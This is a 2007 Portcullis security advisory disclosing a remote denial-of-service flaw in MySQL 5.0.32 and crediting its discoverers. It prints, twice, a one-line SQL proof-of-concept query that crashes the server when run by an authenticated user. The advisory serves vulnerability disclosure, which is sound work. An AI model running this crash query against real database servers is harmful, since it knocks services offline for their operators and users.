Tried, Tested and Proven

Security Advisory 07-009 – MySql Remote Denial Of Service

Vulnerability discovery and development:

Portcullis Security Testing Services

Vulnerable System:

Tested in MySql version – 5.0.32-log Gentoo Linux mysql-5.0.32, however,other versions may also be vulnerable.

Credit for Discovery:

Sumit Siddharth – Portcullis Computer Security Ltd

Ferruh Mavituna – Portcullis Computer Security Ltd.

Affected Systems:



It is possible to crash a MySQL server remotely by running the following query:

SELECT id FROM tablename WHERE id IN(4564,(SELECT IF(1=0,1,1/0)));

The attacker needs to be authenticated to be able to exploit this issue.


This could lead to a Denial of Service scenario.


The following query is sufficient to demonstrate this issue:

SELECT id FROM tablename WHERE id IN(4564,(SELECT IF(1=0,1,1/0)));

Portcullis has developed a patch to address this issue.
Contact for the patch.


Copyright © Portcullis Computer Security Limited 2007, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.


The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.